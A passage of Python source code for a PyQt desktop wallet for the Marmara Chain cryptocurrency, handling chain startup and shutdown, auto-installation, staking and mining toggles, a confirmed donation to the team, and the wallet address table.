self.creditloop_tabWidget.setCurrentIndex(0)\n if index == 6:\n self.update_exchange_market_combobox()\n\n @pyqtSlot(int)\n def credit_tab_changed(self, index):\n if index == 1:\n self.get_contact_names_pubkeys()\n\n def worker_thread(self, thread, worker, method=None, params=None, worker_output=None, execute=None):\n if self.chain_status:\n self.start_animation()\n if method:\n worker.set_method(method)\n if params:\n worker.set_params(params)\n worker.moveToThread(thread)\n worker.finished.connect(thread.quit)\n worker.finished.connect(self.stop_animation)\n if execute is None:\n thread.started.connect(worker.do_execute_rpc)\n if execute == 'refresh_sidepanel':\n thread.started.connect(worker.refresh_sidepanel)\n if execute == 'get_addresses':\n thread.started.connect(worker.get_addresses)\n worker.walletlist_out.connect(worker_output)\n if execute == 'setgenerate':\n thread.started.connect(worker.setgenerate)\n if execute == 'get_balances':\n thread.started.connect(worker.get_balances)\n if execute == 'txids_detail':\n thread.started.connect(worker.txids_detail)\n if execute == 'active_loops_details':\n thread.started.connect(worker.active_loops_details)\n if execute == 'holder_loop_detail':\n thread.started.connect(worker.holder_loop_detail)\n if execute == 'check_fork_api':\n thread.started.connect(worker.check_fork_api)\n if execute == 'wallet_earnings':\n thread.started.connect(worker.calc_wallet_earnings)\n worker.output.connect(self.earnings_output_info)\n thread.start(priority=4)\n if worker_output and execute != 'get_addresses':\n worker.command_out.connect(worker_output)\n return worker\n else:\n logging.info(\"Marmarachain is not started\")\n self.bottom_info(self.tr(\"Marmarachain is not started\"))\n\n @pyqtSlot()\n def start_animation(self):\n self.loading.startAnimation()\n\n @pyqtSlot()\n def stop_animation(self):\n self.loading.stopAnimation()\n\n def check_marmara_path(self):\n self.worker_check_marmara_path = marmarachain_rpc.RpcHandler()\n self.worker_check_marmara_path.moveToThread(self.thread_marmarad_path)\n self.worker_check_marmara_path.finished.connect(self.thread_marmarad_path.quit)\n self.thread_marmarad_path.started.connect(self.worker_check_marmara_path.check_marmara_path)\n self.thread_marmarad_path.start(priority=4)\n self.worker_check_marmara_path.output.connect(self.check_marmara_path_output)\n\n @pyqtSlot(str)\n def check_marmara_path_output(self, output):\n if output == 'get marmarad path':\n self.login_page_info(self.tr('Getting marmara chain path from config file'))\n logging.info('Getting marmara chain path from config file')\n if str(output).split('=')[0] == 'marmarad_path':\n self.login_page_info(self.tr('marmara path from configuration file = ') + str(output).split('=')[1])\n logging.info('marmara path from configuration file = ' + str(output).split('=')[1])\n if output == 'verifiying path':\n self.login_page_info(self.tr('Verifiying the Chain location '))\n logging.info('Verifiying the Chain location ')\n if output == 'marmarad found.':\n self.login_page_info(self.tr('Chain location verified.'))\n logging.info('Chain location verified.')\n self.chain_init()\n if output == 'need to install mcl':\n message_box = self.custom_message(self.tr('Installing Marmarachain'),\n self.tr('Marmarachain is not installed. Would you like to install it?'),\n \"question\", QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n logging.info('Auto-install.')\n self.main_tab.setCurrentIndex(2)\n if marmarachain_rpc.is_local:\n self.sudo_password_lineEdit.setVisible(True)\n if platform.system() == 'Windows':\n self.sudo_password_lineEdit.setVisible(False)\n else:\n self.sudo_password_lineEdit.setVisible(False)\n if message_box == QMessageBox.No:\n self.main_tab.setCurrentIndex(0)\n\n @pyqtSlot()\n def start_autoinstall(self):\n self.worker_autoinstall = marmarachain_rpc.Autoinstall()\n if marmarachain_rpc.is_local:\n if platform.system() == 'Windows':\n start_install = True\n else:\n if self.sudo_password_lineEdit.text():\n self.worker_autoinstall.set_password(self.sudo_password_lineEdit.text())\n start_install = True\n self.sudo_password_lineEdit.clear()\n else:\n message_box = self.custom_message(self.tr('Auto-installation does not begin'), self.tr(\n 'You need to write a password that has admin privileges'), self.tr(\"information\"),\n QMessageBox.Information)\n\n start_install = False\n else:\n start_install = True\n if start_install:\n self.start_install_button.setEnabled(False)\n self.install_progress_textBrowser.append(self.tr('Starting Install ...'))\n logging.info('Starting Install')\n\n self.worker_autoinstall.moveToThread(self.thread_autoinstall)\n self.worker_autoinstall.finished.connect(self.thread_autoinstall.quit)\n self.thread_autoinstall.started.connect(self.worker_autoinstall.start_install)\n self.thread_autoinstall.start()\n self.worker_autoinstall.out_text.connect(self.start_autoinstall_textout)\n self.worker_autoinstall.progress.connect(self.start_autoinstall_progress)\n\n @pyqtSlot(str)\n def start_autoinstall_textout(self, output):\n if str(output).find('Something Went Wrong') > -1:\n message_box = self.custom_message(self.tr('Installation not completed correctly'),\n self.tr(output),\n 'information', QMessageBox.Information)\n self.install_progress_textBrowser.append(output)\n\n @pyqtSlot(int)\n def start_autoinstall_progress(self, val):\n self.install_progressBar.setValue(val)\n if 96 <= val < 100:\n self.install_progressBar.setValue(100)\n message_box = self.custom_message(self.tr('Installation Completed'), self.tr('Starting Marmarachain'),\n 'information', QMessageBox.Information)\n if message_box == QMessageBox.Ok:\n self.main_tab.setCurrentIndex(1)\n self.mcl_tab.setCurrentIndex(0)\n self.check_marmara_path()\n if val > 100:\n self.install_progressBar.setValue(0)\n self.start_install_button.setEnabled(True)\n message_box = self.custom_message(self.tr('Installation not completed correctly'),\n self.tr('Wrong password input. Please install again'),\n 'information', QMessageBox.Information)\n\n @pyqtSlot(str)\n def bottom_info(self, info):\n self.bottom_message_label.setText(info)\n\n def bottom_err_info(self, err_msg):\n try:\n result = json.loads(err_msg)\n self.bottom_info(result['message'])\n logging.error(result['message'])\n except Exception:\n result = str(err_msg).splitlines()\n if str(err_msg).find('error message:') != -1:\n index = result.index('error message:') + 1\n self.bottom_info(result[index])\n logging.error(result[index])\n else:\n err_result = \"\"\n for line in str(err_msg).splitlines():\n err_result = err_result + ' ' + str(line)\n logging.error(err_result)\n self.bottom_info(err_result)\n if str(err_msg) == \"(7, 'Failed to connect to 127.0.0.1 port 33825: Connection refused')\" or \\\n str(err_msg).find(\"error: couldn't connect to server: unknown (code -1)\") != -1:\n if self.chain_status:\n self.custom_message(self.tr('Chain is not Working'),\n self.tr('Make sure the marmara chain is running!'), 'information',\n QMessageBox.Warning)\n self.chain_status = False\n self.chainstatus_label_value.setPixmap(self.inactive_icon_pixmap)\n\n def login_page_info(self, info):\n self.login_message_label.setText(info)\n\n # ---------------------------------------\n # Chain initialization\n # ---------------------------------------\n @pyqtSlot()\n def chain_init(self):\n self.main_tab.setCurrentIndex(1)\n self.mcl_tab.setCurrentIndex(0)\n self.chain_stackedWidget.setCurrentIndex(0)\n self.check_chain_update()\n logging.info('chain_status ' + str(self.chain_status))\n self.bottom_info(self.tr('chain_status ' + str(self.chain_status)))\n time.sleep(0.1)\n zcash_status = marmarachain_rpc.check_zcashparams()\n if zcash_status[0] == 0:\n if not self.chain_status:\n logging.info('Checking marmarachain')\n self.bottom_info(self.tr('Checking marmarachain'))\n marmara_pid = marmarachain_rpc.mcl_chain_status()\n if len(marmara_pid[0]) > 0:\n self.bottom_info(self.tr('marmarachain has pid'))\n logging.info('marmarachain has pid')\n self.is_chain_ready()\n if len(marmara_pid[0]) == 0:\n logging.info('marmarachain is not running')\n self.bottom_info(self.tr('marmarachain is not running'))\n self.enable_start_button()\n\n if zcash_status[0] == 1:\n message_content = \"\"\n corrupted_files = \"\"\n if type(zcash_status[1]) is str:\n message_content = self.tr('ZcashParams folder missing')\n else:\n if len(zcash_status[1]) > 0:\n for item in zcash_status[1]:\n corrupted_files = corrupted_files + item.strip('/') + ' '\n message_content = message_content + self.tr(' incomplete files: ') + corrupted_files + '\\n'\n if len(zcash_status[2]) > 0:\n missing_files = \"\"\n for item in zcash_status[2]:\n missing_files = missing_files + item.strip('/') + ', '\n message_content = message_content + self.tr(' missing files: ') + missing_files\n message_box = self.custom_message('Incomplete ZcashParams',\n message_content + \"\\n\" + self.tr(' Do you want to install'),\n 'question', QMessageBox.Warning)\n if message_box == QMessageBox.Yes:\n self.run_fetch_params(zcash_status[1])\n if message_box == QMessageBox.No: # Abort\n self.logout_host()\n\n def run_fetch_params(self, zc_file=None):\n self.start_animation()\n self.worker_fetch_params = marmarachain_rpc.Autoinstall()\n if zc_file:\n self.worker_fetch_params.set_input_list(zc_file)\n self.worker_fetch_params.moveToThread(self.thread_fetch_params)\n self.worker_fetch_params.finished.connect(self.thread_fetch_params.quit)\n self.worker_fetch_params.finished.connect(self.stop_animation)\n self.worker_fetch_params.finished.connect(self.fetch_params_install_finished)\n self.thread_fetch_params.started.connect(self.worker_fetch_params.fetch_params_install)\n self.thread_fetch_params.start()\n self.update_chain_textBrowser.setVisible(True)\n self.worker_fetch_params.out_text.connect(self.fetch_params_install_result)\n\n def fetch_params_install_result(self, output):\n self.update_chain_textBrowser.append(output)\n\n def fetch_params_install_finished(self):\n message_box = self.custom_message(self.tr('ZcashParams Finished'), self.tr('Starting Chain'), 'information')\n if message_box == QMessageBox.Ok:\n self.chain_init()\n\n def is_chain_ready(self):\n self.bottom_info(self.tr('Checking if marmarachain is ready for rpc'))\n logging.info('Checking if marmarachain is ready for rpc')\n self.start_animation()\n self.worker_getchain = marmarachain_rpc.RpcHandler() # worker setting\n self.worker_getchain.moveToThread(self.thread_getchain) # move object in to thread\n self.worker_getchain.finished.connect(self.thread_getchain.quit) # when finished close thread\n self.worker_getchain.finished.connect(self.stop_animation) # when finished close animation\n self.thread_getchain.started.connect(self.worker_getchain.is_chain_ready) # executing respective worker func.\n self.thread_getchain.start() # start thread\n self.worker_getchain.command_out.connect(self.chain_ready_result) # getting results and connecting to socket\n self.worker_getchain.walletlist_out.connect(self.set_getaddresses_result)\n\n @pyqtSlot(tuple)\n def chain_ready_result(self, result_out):\n if result_out[0]:\n logging.info('chain is ready')\n self.bottom_info(self.tr('chain ready'))\n result = json.loads(result_out[0])\n self.chain_status = True\n self.check_fork_button.setHidden(False)\n self.chainstatus_label_value.setPixmap(self.active_icon_pixmap)\n if result.get('version'):\n self.set_getinfo_result(result)\n self.bottom_info(self.tr('getting wallet addresses'))\n logging.info('getting wallet addresses')\n elif result.get('WalletActivatedAddresses') or result.get('WalletActivatedAddresses') == []:\n TotalAmountOnActivated = 0.0\n for activated in result.get('WalletActivatedAddresses'):\n TotalAmountOnActivated = TotalAmountOnActivated + activated.get('amount')\n self.totalactivated_value_label.setText(str(TotalAmountOnActivated))\n self.wallet_total_activated_value.setText(str(TotalAmountOnActivated))\n else:\n self.setgenerate_result(result_out)\n self.bottom_info(self.tr('Chain init completed.'))\n logging.info('Chain init completed.')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def enable_start_button(self):\n self.startchain_button.setVisible(True)\n self.stopchain_button.setVisible(False)\n\n def disable_start_button(self):\n self.startchain_button.setVisible(False)\n self.stopchain_button.setVisible(True)\n\n def check_chain_update(self):\n self.update_chain_button.setHidden(True)\n self.worker_api_chain_update = marmarachain_rpc.ApiWorker()\n self.worker_api_chain_update.moveToThread(self.thread_api_chain_update_check)\n self.worker_api_chain_update.finished.connect(self.thread_api_chain_update_check.quit)\n self.thread_api_chain_update_check.started.connect(self.worker_api_chain_update.mcl_update_check)\n self.thread_api_chain_update_check.start()\n self.worker_api_chain_update.out_str.connect(self.check_installed_mcl_version)\n self.worker_api_chain_update.out_err.connect(self.check_chain_update_err)\n\n @pyqtSlot(str)\n def check_installed_mcl_version(self, out):\n self.latest_chain_version = out\n if marmarachain_rpc.marmara_path:\n installed_chain_versiyon = self.get_installed_chain_version()\n if out == installed_chain_versiyon:\n self.update_chain_button.setHidden(True)\n else:\n self.update_chain_button.setHidden(False)\n else:\n self.update_chain_button.setHidden(False)\n\n def get_installed_chain_version(self):\n if marmarachain_rpc.is_local:\n file = None\n try:\n file = open(marmarachain_rpc.marmara_path + 'version.info', \"r\")\n self.chain_versiyon_tag = file.read().rstrip()\n self.chain_version_label.setText('Marmara Chain ' + self.chain_versiyon_tag)\n return self.chain_versiyon_tag\n except IOError as error:\n logging.error(\"Exception error while reading mcl version info file: \" + str(error))\n self.update_chain_button.setHidden(False)\n finally:\n if file:\n file.close()\n else:\n remote_file = None\n try:\n sftp_client = marmarachain_rpc.ssh_client.open_sftp()\n remote_file = sftp_client.open(marmarachain_rpc.marmara_path + 'version.info', \"r\")\n self.chain_versiyon_tag = remote_file.read().rstrip().decode()\n self.chain_version_label.setText('Marmara Chain ' + self.chain_versiyon_tag)\n return self.chain_versiyon_tag\n except Exception as error:\n logging.error(\"Exception error while reading mcl version info file: \" + str(error))\n self.update_chain_button.setHidden(False)\n finally:\n if remote_file:\n remote_file.close()\n\n @pyqtSlot(str)\n def check_chain_update_err(self, err):\n self.bottom_info(err)\n self.update_chain_button.setHidden(False)\n logging.error(err)\n\n # --------------------------------------\n # Stopping Chain\n # --------------------------------------\n @pyqtSlot()\n def stop_chain(self):\n if self.chain_status:\n self.start_animation()\n stop_chain_thread = self.stop_chain_thread()\n stop_chain_thread.finished.connect(self.stop_animation) # when finished close animation\n else:\n self.bottom_info(self.tr('Marmarachain is not started'))\n logging.warning('Marmarachain is not started')\n\n def stop_chain_thread(self):\n self.worker_stopchain = marmarachain_rpc.RpcHandler() # worker setting\n self.worker_stopchain.moveToThread(self.thread_stopchain) # putting in to thread\n self.worker_stopchain.finished.connect(self.thread_stopchain.quit) # when finished close thread\n self.thread_stopchain.started.connect(self.worker_stopchain.stopping_chain) # executing worker function\n self.thread_stopchain.start()\n self.worker_stopchain.command_out.connect(self.result_stopchain)\n return self.worker_stopchain\n\n @pyqtSlot(tuple)\n def result_stopchain(self, result_out):\n if result_out[2] != 1:\n if result_out[0]:\n print_result = \"\"\n for line in str(result_out[0]).splitlines():\n print_result = print_result + ' ' + str(line)\n logging.info(\"Stopping chain:\" + print_result)\n self.bottom_info(print_result)\n\n if result_out[0] == 0:\n self.bottom_info(self.tr('Marmarachain stopped'))\n logging.info('Marmarachain stopped')\n self.chain_status = False\n self.myCCActivatedAddress = None\n self.chainstatus_label_value.setPixmap(self.inactive_icon_pixmap)\n self.update_addresses_table()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # -------------------------------------------------------\n # Getting getinfo command\n # -------------------------------------------------------\n @pyqtSlot()\n def get_getinfo(self):\n self.worker_getinfo = marmarachain_rpc.RpcHandler() # worker setting\n method = cp.getinfo # setting command\n params = []\n self.worker_thread(self.thread_getinfo, self.worker_getinfo, method, params, self.getinfo_result)\n\n @pyqtSlot(tuple)\n def getinfo_result(self, result_out):\n if result_out[0]:\n getinfo_result = result_out[0]\n getinfo_result = json.loads(getinfo_result)\n self.bottom_info(self.tr('loading getinfo values'))\n logging.info('Loading getinfo values')\n self.set_getinfo_result(getinfo_result)\n logging.info('getinfo finished')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def set_getinfo_result(self, getinfo_result):\n if getinfo_result.get('synced'):\n self.chainsync_label_value.setPixmap(self.active_icon_pixmap)\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignCenter)\n self.chain_synced = True\n if not getinfo_result.get('synced'):\n self.chain_synced = False\n if int(getinfo_result['longestchain']) == 0:\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignCenter)\n self.chainsync_label_value.setPixmap(self.inactive_icon_pixmap)\n else:\n block_diff = int(getinfo_result['longestchain']) - int(getinfo_result['blocks'])\n days_sync = None\n if 0 < block_diff < 61:\n days_sync = str(block_diff) + self.tr(' Min')\n if 60 < block_diff < 1140:\n days_sync = str(round(block_diff / 60)) + self.tr(' Hour')\n if block_diff > 1140:\n days_sync = str(round(block_diff / 1440)) + self.tr(' Day')\n if block_diff == 0:\n days_sync = None\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignCenter)\n self.chainsync_label_value.setPixmap(self.inactive_icon_pixmap)\n if block_diff:\n self.chainsync_label_value.setAlignment(QtCore.Qt.AlignLeft)\n self.chainsync_label_value.setText(days_sync)\n if getinfo_result.get('pubkey'):\n self.pubkey_status = True\n self.current_pubkey_value.setText(str(getinfo_result['pubkey']))\n if getinfo_result.get('pubkey') is None or getinfo_result.get('pubkey') is \"\":\n self.bottom_info(self.tr('pubkey is not set'))\n logging.warning('pubkey is not set')\n self.pubkey_status = False\n self.current_pubkey_value.setText(\"\")\n if getinfo_result.get('errors') is \"\":\n self.update_chain_textBrowser.setVisible(False)\n if getinfo_result.get('errors') is not \"\":\n self.update_chain_textBrowser.setVisible(True)\n self.update_chain_textBrowser.setText(str(getinfo_result.get('errors')))\n self.difficulty_value_label.setText(str(int(getinfo_result['difficulty'])))\n self.currentblock_value_label.setText(str(getinfo_result['blocks']))\n self.longestchain_value_label.setText(str(getinfo_result['longestchain']))\n connection_count = int(getinfo_result['connections'])\n if connection_count == 0:\n self.connections_warning_label.setVisible(True)\n if connection_count > 0:\n self.connections_warning_label.setVisible(False)\n self.connections_value_label.setText(str(getinfo_result['connections']))\n self.totalnormal_value_label.setText(str(getinfo_result['balance']))\n self.wallet_total_normal_value.setText(str(getinfo_result['balance']))\n self.bottom_info(self.tr('getinfo finished'))\n logging.info('getinfo finished')\n\n # -----------------------------------------------------------\n # Side panel functions\n # -----------------------------------------------------------\n @pyqtSlot()\n def refresh_side_panel(self):\n self.bottom_info(self.tr('getting getinfo'))\n logging.info('getting getinfo')\n # self.get_getinfo()\n self.worker_sidepanel = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_sidepanel, self.worker_sidepanel, worker_output=self.refresh_side_panel_result,\n execute='refresh_sidepanel')\n last_update = self.tr('Last Update: ')\n # date = (str(datetime.now().date()))\n last_update_time = str(datetime.now().time().replace(microsecond=0))\n self.last_update_label.setText(last_update + last_update_time)\n self.update_datetime_edit_maxdates()\n\n @pyqtSlot(tuple)\n def refresh_side_panel_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n if result.get('version'):\n self.set_getinfo_result(result)\n self.bottom_info(self.tr('getting activated balance.'))\n logging.info('getting activated balance.')\n else:\n TotalAmountOnActivated = 0.0\n for activated in json.loads(result_out[0]).get('WalletActivatedAddresses'):\n TotalAmountOnActivated = TotalAmountOnActivated + activated.get('amount')\n self.totalactivated_value_label.setText(str(TotalAmountOnActivated))\n self.wallet_total_activated_value.setText(str(TotalAmountOnActivated))\n self.bottom_info(self.tr('Refresh completed.'))\n logging.info('Refresh completed.')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def update_datetime_edit_maxdates(self):\n self.transactions_startdate_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_stop_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_start_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n self.earning_stop_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.transactions_endtdate_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.make_credit_loop_matures_dateTimeEdit.setMinimumDateTime(QDateTime.currentDateTime())\n\n @pyqtSlot()\n def copyaddress_clipboard(self):\n address = self.currentaddress_value.text()\n if address != \"\":\n QtWidgets.QApplication.clipboard().setText(address)\n self.bottom_info(self.tr('copied ') + address)\n logging.info('copied ' + address)\n else:\n self.bottom_info(self.tr('no address value set'))\n logging.warning('no address value set')\n\n @pyqtSlot()\n def decrease_fontsize(self):\n if self.default_fontsize >= 9:\n self.default_fontsize = self.default_fontsize - 1\n self.set_font_size(self.default_fontsize)\n self.bottom_info('fontsize :' + str(self.default_fontsize))\n\n @pyqtSlot()\n def increase_fontsize(self):\n if self.default_fontsize <= 20:\n self.default_fontsize = self.default_fontsize + 1\n self.set_font_size(self.default_fontsize)\n self.bottom_info('fontsize :' + str(self.default_fontsize))\n\n @pyqtSlot()\n def copypubkey_clipboard(self):\n pubkey = self.current_pubkey_value.text()\n if pubkey != \"\":\n QtWidgets.QApplication.clipboard().setText(pubkey)\n self.bottom_info(self.tr('copied ') + pubkey)\n logging.info('copied ' + pubkey)\n else:\n self.bottom_info(self.tr('no pubkey value set'))\n logging.warning('no pubkey value set')\n\n @pyqtSlot()\n def open_discord(self):\n webbrowser.open_new('https://marmara.io/discord')\n\n @pyqtSlot()\n def open_youtube(self):\n webbrowser.open_new('https://www.youtube.com/c/MarmaraCreditLoops')\n\n @pyqtSlot()\n def open_website(self):\n webbrowser.open_new('https://marmara.io')\n\n @pyqtSlot()\n def toggle_staking(self):\n if self.staking_button.isChecked(): # Staking button status is True.\n if self.mining_button.isChecked(): # Checking mining is also active\n message_box = self.custom_message(self.tr('Turning off Mining'),\n self.tr('Mining is currently on. '\n 'You are about to turn off mining. Are you sure?'),\n \"question\",\n QMessageBox.Question)\n\n if message_box == QMessageBox.Yes:\n self.mining_button.setChecked(False) # Close mining and set staking mode\n self.cpu_core_selection_off()\n logging.info('setgenerate True 0')\n self.setgenerate([True, 0])\n if message_box == QMessageBox.No: # Abort selecting staking and continue mining\n self.staking_button.setChecked(False)\n else: # set staking mode\n logging.info('setgenerate True 0')\n self.setgenerate([True, 0])\n else: # Staking button status is False\n message_box = self.custom_message(self.tr('Turning off Staking'),\n self.tr('You are about to turn off staking. Are you sure?'), \"question\",\n QMessageBox.Question)\n\n if message_box == QMessageBox.Yes:\n logging.info('setgenerate False')\n self.setgenerate([False])\n if message_box == QMessageBox.No:\n self.staking_button.setChecked(True) # Abort selecting staking button\n\n @pyqtSlot()\n def toggle_mining(self):\n if self.mining_button.isChecked(): # Mining button status is True.\n if self.staking_button.isChecked(): # Checking staking is also active\n message_box = self.custom_message(self.tr('Turning off Staking'),\n self.tr('Staking is currently active. '\n 'You are about to turn off staking. Are you sure?'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.staking_button.setChecked(False) # Close staking and turn on mining\n logging.info('setgenerate True 1')\n self.setgenerate([True, 1])\n self.cpu_core_selection_on()\n if message_box == QMessageBox.No: # Abort selecting mining and continue staking\n self.mining_button.setChecked(False)\n else: # Staking is off turn on Mining mode\n logging.info('setgenerate True 1')\n self.cpu_core_selection_on()\n self.setgenerate([True, 1])\n else: # Mining button status is False.\n message_box = self.custom_message(self.tr('Turning off Mining'),\n self.tr('You are about to turn off mining. Are you sure?'), \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n logging.info('setgenerate False')\n self.cpu_core_selection_off()\n self.setgenerate([False])\n if message_box == QMessageBox.No:\n self.mining_button.setChecked(True) # Abort selecting mining button\n\n def cpu_core_selection_on(self):\n self.cpu_label.setVisible(True)\n self.cpu_core_lineEdit.setVisible(True)\n self.cpu_core_set_button.setVisible(True)\n\n def cpu_core_selection_off(self):\n self.cpu_label.setVisible(False)\n self.cpu_core_lineEdit.setVisible(False)\n self.cpu_core_set_button.setVisible(False)\n\n def setgenerate(self, arg):\n self.worker_setgenerate = marmarachain_rpc.RpcHandler()\n method = cp.setgenerate\n params = arg\n self.worker_thread(self.thread_setgenerate, self.worker_setgenerate, method, params, self.setgenerate_result,\n execute='setgenerate')\n\n @pyqtSlot(tuple)\n def setgenerate_result(self, result_out):\n if result_out[0]:\n logging.info('\\n---- getgenerate result------\\n' + str(json.loads(result_out[0])))\n result = json.loads(result_out[0])\n if result.get('staking') is True and result.get('generate') is False:\n self.bottom_info(self.tr('Staking ON'))\n logging.info('Staking ON')\n self.staking_button.setChecked(True)\n self.mining_button.setChecked(False)\n if result.get('staking') is False and result.get('generate') is False:\n self.bottom_info(self.tr('Mining status is OFF'))\n logging.info('Mining status is OFF')\n self.staking_button.setChecked(False)\n self.mining_button.setChecked(False)\n if result.get('generate') is True and result.get('staking') is False:\n self.bottom_info(self.tr('Mining ON with ') + str(result.get('numthreads')))\n logging.info('Mining ON with ' + str(result.get('numthreads')))\n self.cpu_core_lineEdit.setText(str(result.get('numthreads')))\n self.cpu_core_selection_on()\n self.staking_button.setChecked(False)\n self.mining_button.setChecked(True)\n if result_out[1]:\n self.bottom_err_info(self.tr(result_out[1]))\n\n @pyqtSlot()\n def setmining_cpu_core(self):\n cpu_no = self.cpu_core_lineEdit.text()\n self.setgenerate([True, int(cpu_no)])\n\n @pyqtSlot()\n def toggle_walletsummary(self):\n if self.walletsummary_amount_frame.isHidden():\n self.walletsummary_hide_button.setIcon(qta.icon('ei.eye-close', color='#cc2900'))\n self.walletsummary_hide_button.setToolTip(self.tr('Hide'))\n self.walletsummary_amount_frame.setHidden(False)\n configuration.ApplicationConfig().set_key_value('USER', 'balance_hide', 'False')\n else:\n self.walletsummary_hide_button.setIcon(qta.icon('ei.eye-open', color='#cc2900'))\n self.walletsummary_hide_button.setToolTip(self.tr('Show'))\n self.walletsummary_amount_frame.setHidden(True)\n configuration.ApplicationConfig().set_key_value('USER', 'balance_hide', 'True')\n\n @pyqtSlot()\n def calculate_amount(self):\n number_of_cups = self.cup_lineEdit.text()\n if number_of_cups == \"\" or int(number_of_cups) == 0:\n self.support_pushButton.setEnabled(False)\n self.support_pushButton.setText(self.tr('Support'))\n else:\n amount = int(number_of_cups) * 30\n self.support_pushButton.setEnabled(True)\n self.support_pushButton.setText(self.tr('Support') + ' (' + str(amount) + ' MCL)')\n\n @pyqtSlot()\n def send_coins_to_team(self):\n number_of_cups = self.cup_lineEdit.text()\n amount = int(number_of_cups) * 30\n team_address = 'RXWqisAoJKEGVyXj46Zo3fDZnZTwQA6kQE'\n self.support_pushButton.setText(self.tr('Support') + ' (' + str(amount) + ' MCL)')\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr(f'The amount to be send to the Marmara Team is ') + str(amount)\n + ' MCL',\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.worker_sendtoteam = marmarachain_rpc.RpcHandler()\n method = cp.sendtoaddress\n params = [team_address, str(amount)]\n self.worker_thread(self.thread_sendtoteam, self.worker_sendtoteam, method, params,\n self.sendtoaddress_result)\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n\n # -----------------------------------------------------------\n # Chain page functions\n # -----------------------------------------------------------\n\n # getting addresses for address table widget\n @pyqtSlot()\n def getaddresses(self):\n if self.chain_status:\n self.bottom_info(self.tr('getting wallet addresses'))\n logging.info('getting wallet addresses')\n self.worker_getaddresses = marmarachain_rpc.RpcHandler()\n self.worker_thread(thread=self.thread_getaddresses, worker=self.worker_getaddresses,\n worker_output=self.set_getaddresses_result, execute='get_addresses')\n else:\n self.update_addresses_table()\n\n @pyqtSlot(list)\n def set_getaddresses_result(self, result_out):\n if result_out == []:\n self.bottom_err_info(self.tr('could not get addresses. make sure chain is running'))\n else:\n self.bottom_info(self.tr('Loading Addresses ...'))\n logging.info('Loading Addresses ...')\n self.addresses_tableWidget.setSortingEnabled(False)\n self.addresses_tableWidget.setRowCount(len(result_out))\n logging.info('\\n------wallet address list----- \\n' + str(result_out))\n for row in result_out:\n row_number = result_out.index(row)\n if self.pubkey_status:\n self.addresses_tableWidget.setColumnHidden(0, True)\n btn_setpubkey = QPushButton('Set pubkey')\n self.addresses_tableWidget.setCellWidget(row_number, 0, btn_setpubkey)\n self.addresses_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n for item in row:\n self.addresses_tableWidget.setItem(row_number, (row.index(item) + 1), QTableWidgetItem(str(item)))\n self.addresses_tableWidget.horizontalHeader().setSectionResizeMode((row.index(item) + 1),\n QHeaderView.ResizeToContents)\n btn_setpubkey.clicked.connect(self.set_pubkey)\n self.bottom_info(self.tr('Loading Addresses finished'))\n logging.info('Loading Addresses finished')\n self.addresses_tableWidget.setSortingEnabled(True)\n # self.hide_address_checkBox.setCheckState(False)\n self.update_addresses_table()\n\n @pyqtSlot()\n def hide_addresses(self):\n self.unhide_addresses()\n if self.hide_address_checkBox.checkState():\n rowcount = self.addresses_tableWidget.rowCount()\n while True:\n rowcount = rowcount - 1\n if self.addresses_tableWidget.item(rowcount, 1).text() == \"0.0\":\n self.addresses_tableWidget.setRowHidden(rowcount, True)\n if rowcount == 0:\n break\n\n def unhide_addresses(self):\n rowcount = self.addresses_tableWidget.rowCount()\n while True:\n rowcount = rowcount - 1\n self.addresses_tableWidget.setRowHidden(rowcount, False)\n if rowcount == 0:\n break\n\n @pyqtSlot(int, int)\n def addresstable_itemcontext(self, row, column):\n item = self.addresses_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n def update_addresses_table(self):\n if self.addresses_tableWidget.rowCount() > 0:\n if self.pubkey_status:\n self.addresses_tableWidget.setColumnHidden(0, True)\n if self.current_pubkey_value.text() == \"\":\n self.get_getinfo()\n current_pubkey = self.current_pubkey_value.text()\n rowcount = self.addresses_tableWidget.rowCount()\n while True:\n rowcount = rowcount - 1\n if current_pubkey == self.addresses_tableWidget.item(rowcount, 3).text():\n self.currentaddress_value.setText(self.addresses_tableWidget.item(rowcount, 2).text())\n if rowcount == 0:\n break\n if not self.chain_status:\n self.addresses_tableWidget.setColumnHidden(0, False)\n rowcount = self.addresses_tableWidget.rowCount()\n self.addresses_tableWidget.setRowCount(rowcount)\n while True:\n btn_start = QPushButton('Start')\n btn_start.setIcon(QIcon(self.icon_path + \"/start_icon.png\"))\n rowcount = rowcount - 1\n self.addresses_tableWidget.setCellWidget(rowcount, 0, btn_start)\n btn_start.clicked.connect(self.start_chain_with_pubkey)\n if rowcount == 0:\n break\n self.hide_addresses()\n self.get_known_addresses()\n\n def check_address_contact_name(self, address):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n known_address = \"\"\n for contact in contacts_data: # each contact set in contacts_data\n if contact[1] == address: # contact[1] contact address\n known_address = contact[0] # contact[0] contact name\n break\n return known_address\n\n def get_known_addresses(self):\n rowcount = self.addresses_tableWidget.rowCount()\n self.addresses_tableWidget.setRowCount(rowcount)\n while True:\n rowcount = rowcount - 1\n address = self.addresses_tableWidget.item(rowcount, 2).text()\n known_address = self.check_address_contact_name(address)\n self.addresses_tableWidget.setItem(rowcount, 4, 